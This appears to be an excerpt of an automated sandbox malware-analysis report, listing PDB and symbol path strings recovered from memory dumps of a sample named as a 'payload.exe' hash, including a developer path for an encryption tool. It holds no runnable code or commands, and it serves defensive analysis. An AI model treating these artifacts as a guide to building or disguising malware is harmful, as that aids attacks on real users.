Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\.pdb\gM source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2325989468.0000000004682000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328255306.000000000468A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328365004.00000000046AB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281607594.0000000004555000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\te\0 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288044780.0000000004301000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280863089.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288336972.000000000430A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282294702.00000000042FE000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289471959.0000000004311000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\63\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\om source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289371112.00000000042A4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304731023.00000000042A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\u source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2314858413.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309490002.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309043615.00000000041B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.vapo* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb/ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220619290.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ry\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\a\<o source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316052505.000000000419F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309670464.000000000419D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309087828.000000000419A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\CH source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304673578.000000000455B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304545377.000000000454A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969857893.0000000003CC8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969596847.0000000003CC2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289329759.0000000004202000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\} source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004211000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281094654.0000000004211000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004203000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ICE source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\BjA source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2310310548.0000000004323000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2308898477.000000000431A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304397564.000000000431A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279774286.0000000004343000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.000000000433C000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271963806.0000000004323000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\nes\L3 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220619290.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245981120.0000000003CE7000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245017706.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2272328105.0000000004177000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269305125.000000000416F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269073455.000000000415B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244964075.000000000416B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245575111.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004181000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\o**\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220586448.0000000003D01000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220855829.0000000003D07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .LOGUser.datntkrnlmp.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220259603.00000000041F7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2320978316.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280863089.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282294702.00000000042FE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ije source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268917126.0000000003D24000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269368063.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268652417.0000000004181000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270401178.00000000041F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\tate\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333662373.0000000004622000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\& source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269305125.000000000416F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269073455.000000000415B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244964075.000000000416B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.vapogi source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\p\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280863089.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2272250525.00000000042F2000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282294702.00000000042FE000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271508428.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268742531.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\\Q source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315018219.0000000004502000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316096635.0000000004523000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\320\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2320978316.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\P source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279197442.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280968571.00000000042E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\q source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\OH\| source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244648233.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271963806.0000000004323000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\SystemAppData\a\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281481363.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280221874.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279813612.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004174000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280272665.00000000041F3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004179000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\) source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\8 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279774286.0000000004343000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271963806.0000000004323000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280009044.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\' source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbansferApiGroup source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220259603.00000000041F7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\G source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004174000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288915602.0000000004171000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004179000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289842749.0000000004191000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\3 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
